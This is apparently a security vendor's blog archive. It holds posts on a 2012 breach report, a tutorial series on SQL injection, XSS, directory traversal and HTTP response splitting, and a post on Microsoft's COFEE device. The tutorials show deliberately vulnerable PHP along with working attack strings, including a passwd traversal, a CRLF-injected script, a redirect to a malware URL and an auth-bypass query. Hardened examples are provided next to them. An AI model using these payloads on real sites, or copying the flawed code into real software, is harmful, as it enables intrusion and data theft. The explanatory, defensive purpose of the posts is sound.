Good Business Practice Part 5: Lingering Weakness

epic on May 17th, 2012 | File Under Uncategorized -

I’m still going through this report bit by bit, trying to take in and learn as much as I can. Today I hit the Asia/Pacific portion of the report, and I’m not shocked by what I’m reading. It’s not the type of attack, not how the attack was carried out, not even what they were after; what shocks me about this portion of the report is that it comes down to the same old reasons. Maybe I shouldn’t be surprised, but once again the report points out that it was the weakest, most ill-prepared companies that took the brunt of the attacks. I guess I am shocked, but in some ways I’m not: shocked that this message isn’t clear to a lot of companies out there, and that there still seem to be business owners who take the least effective path, thinking, “It’ll never happen to us, what are the odds?”

Clearly one assurance remains in this battle: daily scans. Imagine getting a security report on your data infrastructure each morning: knowing where you stand, knowing your customers’ information is being protected the best way possible, knowing what you need to fix, where your weaknesses are and how to improve them.

I know I’m harping on this, and maybe you get the picture by now, but I know for a fact that there are still people out there who are ignoring my warnings and encouragements. Why? Well, if everyone understood their security risks and wanted to do something about it, my blog wouldn’t be about the year’s latest attacks :)

Today’s information came from page 17 of the TrustWave Global Security report for 2012. It can be found here.


Good Business Practice – Part 4

epic on May 8th, 2012 | File Under Uncategorized -

I’m still going through this security report, and for good reason: it’s showing me a lot I need to learn, a lot that everyone needs to learn.

I’m currently on the section where they discuss how criminals will go after your stored data, but only if it’s easy. Typically an attack will not occur if it becomes difficult or takes too much time. The thief just wants to get in, steal your information and get out. This is an important fact to focus on. I know it doesn’t seem all that big a deal, but it is. It shows us that with preparation, due diligence, and constant measures to increase our security, thieves will actually move along to easier targets. You can protect yourself just by making the attack not worth their time or effort.

So once again, with daily scans, security compliance, good software design, and the right mentality, you can avert a good portion of your security risks. Being more determined, better protected and diligent about security pays off.

The information for this article can be found on page 15 of the report.


Good Business Practice – Part 3

epic on May 2nd, 2012 | File Under Uncategorized -

Continuing my rampage through the TrustWave Global Security report for 2012, I come across the section where they outline where “identifiable” attacks came from. It came as a little bit of a surprise to see the Russian Federation at the top of the list, second only to Unknown attacks. Let me explain how this works. All attacks that could not be traced or whose origins could not be identified are listed as Unknown in origin. They could have come from anywhere, and we will never know. Of those that could be identified, 29.6% of all attacks came from Russia, twice as many as the next largest source, the USA at 10.5%.

It’s up for interpretation what all of this means. Do those countries need stricter laws? Is there an encouraging factor that is breeding these attacks? Does the security in those countries need to rise? Do these regions require greater “chip & pin” technology? Are the current safeguards for personal information enough? Does better technology increase our safety or decrease it? Some good questions to consider in the coming months.

The material discussed in today’s blog can be found on page 14 of the TrustWave Global Security report for 2012.


Good Business Practice – Part 2

epic on May 1st, 2012 | File Under Uncategorized -

I’m continuing my review of the TrustWave 2012 Global Security Report, and I came across something pretty important. We already know that the Food & Beverage industry made up a very large portion of attacks last year, by far the most targeted industry. But on further reading, most of those attacks happened to retail franchises that outsourced their development/maintenance services, most notably the smaller franchises. 76% of attacks were attributed to businesses that outsourced their software and development. Another fact revealed is that most of the businesses that outsourced were not even aware of any security standard their software developer had to adhere to.

This brings up one of the things we keep harping on here at SecuSolutions: due diligence. The daily scans? That’s due diligence. Those scans would find the holes left by the software developer and prevent them from becoming problems.

I’m going to quote the paragraph from the report below. It’s an eye opener:

“The majority of our analysis of data breach investigations – 76% – revealed that the third party responsible for system support, development and/or maintenance introduced the security deficiencies exploited by attackers. Small businesses within the food and beverage and retail industries were most often impacted by these attacks, as they typically outsource all development and support of their systems. Anecdotally, merchants were unaware of the security best practices or compliance mandates by which their partners were required to abide. In other instances, victims were unaware that this third party was only responsible for a subset of security controls – thus still leaving these systems open to attack.”

-  TrustWave Global Security Report 2012, System Administration & Responsibility, Page 10


Good Business Practice – Part 1

epic on April 25th, 2012 | File Under Uncategorized -

I just stumbled across the TrustWave 2012 Global Security Report. While I’m still reading through it (it’s 65 pages), some key points are standing out about where trends have been over the last year and where we think they are likely to head. The report also has some good suggestions about security measures you can take to protect yourself, but the bottom line remains: daily vulnerability scanning is still one huge step towards proper protection and preparedness.

The report goes on to tell us that businesses in franchise chains that hold customer data are most likely to be hit. The popular focus of attacks is still customer data. When I say customer data I’m talking about personally identifiable information like mailing addresses, credit card numbers, social security information, things like that. So if you are a medium to large company that holds a great deal of customer info, it’s time to buckle up! This report says you are most likely to be hit by attacks.

I have to agree with the report’s findings. It was well conducted and, on a fundamental level, it just makes sense. Go after the information tied to the little guy, the guy who doesn’t have many resources, the guy who trusted his info to someone else. The guy who, having once offered up his information for legitimate business, now has no way of erasing it or protecting it. Now add the fact that if it’s a large business, you have millions of people’s information you can get your hands on; hence the reason for attack.

If you make any resolution this year with your business, it should be for secure business practice: preparedness for your clients’ sake, for your reputation, and because it’s how you do good business.

The report can be found here, although you do have a small sign up form to fill out in order to download it.


Web Application Security: Part 4 – HTTP Response Splitting

Brennan Kootnekoff on December 18th, 2010 | File Under Uncategorized -

HTTP Response Splitting is yet another vulnerability that arises from improper validation/sanitization of user input. It affects pages that copy user input directly into HTTP header values, such as redirects.

For example, here is the code of a vulnerable page:

<?php
$redirurl = $_REQUEST['redirurl'];
header("Location: /goto.php?url=$redirurl");
?>

If you send the text “top” to the redirurl parameter, the usual server response would be:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28 GMT
Location: http://www.website.com/goto.php?url=top
Content-Type: text/html
Connection: Close

But a malicious user would use this unsanitized input to his advantage and modify the HTTP response headers. This is done by sending a CRLF line termination inside the parameter and shaping a completely different response after it.

For example, if a malicious user were to send the following data for the redirurl parameter:

blergh%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<script>alert('surprise');</script>

The server would respond with:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28 GMT
Location: http://www.website.com/goto.php?url=blergh
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<script>alert('surprise');</script>

This would completely alter the page: instead of the usual content, the user would see a popup box with the word ‘surprise’ on their screen.

This can be even used maliciously to redirect unsuspecting users to a completely different website.
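The mechanics described above, as an added example in Python rather than the post’s PHP (this is not code from the post or from SecuScan): the vulnerable builder pastes the parameter into the Location header exactly as the PHP snippet does, a small parser counts how many responses a client would see, and a hardened builder rejects control characters, allows only a plain page name, and percent-encodes what remains. The function names and the allowlist rule are this example’s own assumptions; the payload is the URL-decoded form of the one shown in the post.

```python
"""Added example (Python, not the post's PHP): how an unsanitized redirect
parameter splits the response, and a hardened builder that refuses it.
Function names and the allowlist rule are this example's own assumptions."""
import re
from urllib.parse import quote, unquote

# Constructed input: the URL-decoded form of the payload shown in the post.
SPLIT_PAYLOAD = unquote(
    "blergh%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a<script>alert('surprise');</script>"
)

# Any CR, LF or other control character inside a header value ends the header.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def vulnerable_redirect(redirurl: str) -> bytes:
    """Mirrors the vulnerable PHP: the parameter is pasted into the Location header."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: /goto.php?url={redirurl}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ).encode("latin-1")


def count_status_lines(raw: bytes) -> int:
    """How many HTTP responses a client would parse out of one server reply."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


def check_redirect_target(redirurl: str):
    """Return None if the value may go into a header, else the reason it was rejected."""
    if CONTROL_CHARS.search(redirurl):
        return "control character (CR/LF) in redirect target"
    # Assumed site rule: the redirect target is a bare page name such as 'top'.
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", redirurl):
        return "redirect target is not a plain page name"
    return None


def safe_redirect(redirurl: str) -> bytes:
    """Hardened builder: reject bad input first, then percent-encode what remains."""
    reason = check_redirect_target(redirurl)
    if reason is not None:
        raise ValueError(reason)
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: /goto.php?url={quote(redirurl, safe='')}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    print(count_status_lines(vulnerable_redirect("top")))           # 1
    print(count_status_lines(vulnerable_redirect(SPLIT_PAYLOAD)))   # 2: the response was split
    print(check_redirect_target(SPLIT_PAYLOAD))
```

Two responses parsed out of one reply is the signature of the bug, and that count is what a test or a scanner can assert on. Rejecting the input is done before encoding on purpose: percent-encoding alone would also stop the split, but refusing a value that should never contain CR or LF gives you something to log. PHP’s own header() has refused values containing a newline since PHP 4.4.2 and 5.1.2, so on a current runtime the check above is what the platform does for you; the validation of the redirect target is still your job.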

Finding every location which incorporates user input in headers may be a nightmare with a large website. SecuScan can help automate this procedure as well as looking for Directory Traversal vulnerabilities on your website on a day to day basis.

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!


Web Application Security Part 3 – Directory Traversal

Brennan Kootnekoff on November 29th, 2010 | File Under Uncategorized -

A directory traversal vulnerability occurs when user-supplied file names are not validated. It can be used to read files the application never intended to expose, anywhere the server process can reach.

For example, here is some vulnerable code:

First Page:

<?php
$template = 'main.php';
if (isset($_REQUEST['template']))
    $template = $_REQUEST['template'];
include("/etc/apache2/templates/" . $template);
?>

If someone were to send the following as a POST or GET request:

&template=../../../../../../etc/passwd

The user would be able to read the complete user list on the server and brute-force the passwords on the hacker’s local machine. If there are sensitive files on the server, such as unencrypted master password lists or source code, this vulnerability can cause irreparable damage to a company of any size.

With PHP this risk can be mitigated by normalizing the requested path or rewriting request handlers so that user input is never passed directly to a filesystem function, but finding every location that feeds user input into a file operation may be a nightmare with a large website. SecuScan can help automate this procedure as well as looking for Directory Traversal vulnerabilities on your website on a day to day basis.
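The mitigation just described, as an added example in Python rather than the post’s PHP (not the post’s or SecuScan’s code): the first function shows what the vulnerable include() actually opens once the operating system collapses the ../ sequences, and the second resolves a template name safely under the same directory by decoding it, checking it against an allowlist of bare file names, and confirming the canonical path never leaves the template root. The function names, the allowlist rule and the extra percent-encoded probe are this example’s own assumptions; the directory and the ../../../../../../etc/passwd request are the ones from the post.

```python
"""Added example (Python, not the post's PHP): resolving a template name
safely under the directory the vulnerable snippet uses. The function names
and the allowlist rule are this example's own assumptions."""
import posixpath
import re
from urllib.parse import unquote

TEMPLATE_ROOT = "/etc/apache2/templates"  # directory from the vulnerable PHP above
# Allowlist: a bare file name with a .php extension; no slashes, no '..'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.php$")


def vulnerable_template_path(template: str) -> str:
    """What the vulnerable include() ends up opening, after '..' is collapsed."""
    return posixpath.normpath(TEMPLATE_ROOT + "/" + template)


def resolve_template(template: str, root: str = TEMPLATE_ROOT):
    """Return the canonical path inside root, or None if the request must be refused."""
    name = unquote(template)  # check the decoded form so ..%2F.. cannot slip past
    if not SAFE_NAME.match(name):
        return None
    candidate = posixpath.normpath(posixpath.join(root, name))
    # Belt and braces: even if the allowlist were loosened later, never leave root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    print(vulnerable_template_path("../../../../../../etc/passwd"))  # /etc/passwd
    print(resolve_template("main.php"))                               # /etc/apache2/templates/main.php
    print(resolve_template("../../../../../../etc/passwd"))            # None
```

The allowlist does the real work; the commonpath check is there so that a future relaxation of the pattern (say, allowing a subdirectory) still cannot escape the root. Decoding before checking matters because a scanner or attacker will send the same ../ sequence percent-encoded, and a check on the raw string would pass it through.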

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!


Web Application Security: Part 2 – Cross Site Scripting (XSS)

Brennan Kootnekoff on November 19th, 2010 | File Under Uncategorized -

A Cross-site scripting vulnerability occurs when, as with a SQL Injection vulnerability, input validation is not performed correctly, and maliciously crafted input can change the layout of the page and/or redirect visitors to different websites. Cross-site scripting attacks are usually performed on pages where user input is displayed directly.

For example, here is some vulnerable code:

First Page:

<form action="search.php" method="GET">
Search
<input type="text" name="search_item" id="search_item" />
<input type="submit" value="Submit" />
</form>

Second Page:

<?php echo "Search String: "; echo $_REQUEST['search_item']; ?>

If someone were to send a search string such as the following:

<script>window.location="http://www.hacker-site.com/virus.exe";</script>

The page would echo that script unchanged, so it runs in the browser of whoever views the result and sends them to the attacker’s site. This method can also be used maliciously to create popups or change a website’s layout, which is especially damaging when the injected input is recorded in a database and shown to every later visitor.

With PHP this risk can be mitigated using the htmlentities function, but finding every location that displays user input may be a nightmare with a large website. SecuScan can help automate this procedure, and look for SQL Injection vulnerabilities on your website on a day to day basis.
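The second page rendered both ways, as an added example in Python rather than the post’s PHP (not the post’s or SecuScan’s code): one function echoes the search string as the vulnerable page does, the other escapes it first, with Python’s html.escape standing in for PHP’s htmlentities. The function names are this example’s own assumptions; the payload is the redirect script from the post.

```python
"""Added example (Python, not the post's PHP): the search page rendered with
the raw input versus HTML-escaped input. The function names are this
example's own; html.escape plays the role of PHP's htmlentities()."""
import html

# Constructed input: the redirect script from the post above.
XSS_PAYLOAD = '<script>window.location="http://www.hacker-site.com/virus.exe";</script>'


def render_vulnerable(search_item: str) -> str:
    """Mirrors the vulnerable second page: the parameter is echoed as-is."""
    return f"<p>Search String: {search_item}</p>"


def render_safe(search_item: str) -> str:
    """Escape <, >, &, double and single quotes so the browser shows the text
    instead of interpreting it as markup."""
    return f"<p>Search String: {html.escape(search_item, quote=True)}</p>"


def script_tag_survives(rendered: str) -> bool:
    """Check a reviewer or a test can apply: did a <script> tag reach the output?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))   # the tag is live markup
    print(render_safe(XSS_PAYLOAD))         # &lt;script&gt;... is inert text
    print(script_tag_survives(render_safe(XSS_PAYLOAD)))   # False
```

Escaping is applied at output time, not at storage time: the same render_safe call neutralises a payload that arrived in the request and one that was saved to a database months ago, which is the stored-XSS case the post mentions. Escaping the quote characters as well (quote=True) is what keeps the same helper usable when the value is placed inside an attribute such as the search box’s value.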

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!


Web Application Security: Part 1 The SQL Injection Attack

Brennan Kootnekoff on October 18th, 2010 | File Under Uncategorized -

You may hear this term used frequently in articles about security incidents, but few people outside of web developers and dedicated security staff truly understand how the attack really works.

An SQL Injection attack occurs when an attacker sends a maliciously crafted request specifically designed to exploit input validation (or lack thereof) against a vulnerable website.

For example, if a username/password login check is (simplistically) written like this:

$username = get_username_parameter();
$password = get_password_parameter();
$result = query("SELECT * FROM users WHERE username='$username' AND password='$password'");
if (count($result) == 1) { login_ok(); }

If a user inputs “Terry” as a username and “superman” as his/her password, the SQL query on line 3 would look like:

SELECT * FROM users WHERE username='Terry' AND password='superman';

But as you can see, the variables $username, and $password are not validated at all, and query will accept any data that a user passes.

So if a user accidentally puts a single quote (apostrophe) somewhere in his/her username, it would break the SQL query and cause the webpage to throw an error. This is known as an unintentional SQL Injection.

SELECT * FROM users WHERE username='Te'rry' AND password='superman';

But an attacker may leverage this type of code to gain access to a user account without a password. If an attacker were to type in ' OR 1='1 as the password, it would rewrite the SQL query to:

SELECT * FROM users WHERE username='Terry' AND password='' OR 1='1';

As you can see from the above query, the SQL server would try to match a blank password, OR 1=1. Since either a blank password or 1=1 (which is always true) is accepted as a match, the query will return a row, and the application will authenticate the attacker.

Simple input validation can mitigate this risk, but looking for these issues can be a nightmare – especially in larger web applications. SecuScan can help automate this procedure, and look for SQL Injection vulnerabilities on your website on a day to day basis.
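The login check built both ways, as an added example in Python with SQLite rather than the post’s pseudo-PHP (not the post’s or SecuScan’s code): the concatenated query reproduces the accidental breakage and the password bypass described above, and the parameterised query is the “simple input validation” that removes both. The table, the sample user, and the function names are constructed for this example. The bypass is written ' OR '1'='1 rather than the post’s ' OR 1='1 because SQLite compares the integer 1 and the text '1' as unequal; the effect on the query is the same.

```python
"""Added example (Python + sqlite3, not the post's pseudo-PHP): the login
check built by string concatenation next to the same check with bound
parameters. The table, the sample user and the function names are
constructed for this example."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user, stored as in the post's example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plain-text password only to mirror the post; real systems store hashes.
    conn.execute("INSERT INTO users VALUES ('Terry', 'superman')")
    return conn


DB = make_db()


def login_vulnerable(username: str, password: str, conn=DB):
    """The concatenated query from the post. Returns True/False, or None when
    the input breaks the SQL (the 'unintentional injection' case)."""
    sql = (f"SELECT * FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return len(rows) >= 1


def login_safe(username: str, password: str, conn=DB) -> bool:
    """Bound parameters: the driver sends the values separately from the SQL,
    so a quote in the input is data, never syntax."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    rows = conn.execute(sql, (username, password)).fetchall()
    return len(rows) == 1


if __name__ == "__main__":
    print(login_vulnerable("Terry", "superman"))     # True
    print(login_vulnerable("Te'rry", "superman"))    # None: the quote broke the query
    print(login_vulnerable("Terry", "' OR '1'='1"))  # True: authenticated without the password
    print(login_safe("Terry", "' OR '1'='1"))        # False
    print(login_safe("Te'rry", "superman"))          # False, and no error
```

The parameterised version needs no escaping or filtering of the input at all, which is why it is the fix to reach for first: the text the user typed never becomes part of the statement, so neither the accidental apostrophe nor the deliberate OR clause can change what the query means.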

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!


You’re the Crime in My COFEE

Brennan Kootnekoff on July 5th, 2010 | File Under Uncategorized -

Sorry. The line was there. I had to use it. Besides, Valleywag already has the best title for this story: At Microsoft, COFEE serves you — to the police

In latest designed-to-scare-the-crap-out-of-you news, Microsoft has confirmed that it’s developed an innocuous-looking and addictively-named peripheral the size of a key fob that plugs into your computer, vacuums up a copy of everything on that computer, cracks all your passwords, decrypts all your encryption, and just generally does whatever it likes with whatever you’ve got until it’s done.

And it’s giving them away free.

That was the bad news. The good news is, they’re only giving them to the Good Guys.

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June. Microsoft General Counsel Brad Smith described its use to the 350 law-enforcement experts attending a company conference Monday.
The device contains 150 commands that can dramatically cut the time it takes to gather digital evidence…it also eliminates the need to seize a computer itself, which typically involves disconnecting from a network, turning off the power and potentially losing data. Instead, the investigator can scan for evidence on site.
More than 2,000 officers in 15 countries, including Poland, the Philippines, Germany, New Zealand and the United States, are using the device…
Smith acknowledged Microsoft’s efforts are not purely altruistic. It benefits from selling collaboration software and other technology to law-enforcement agencies, just like everybody else, he said.

Well, that should all make us feel better, no? After all, the police hardly ever lose anything important.
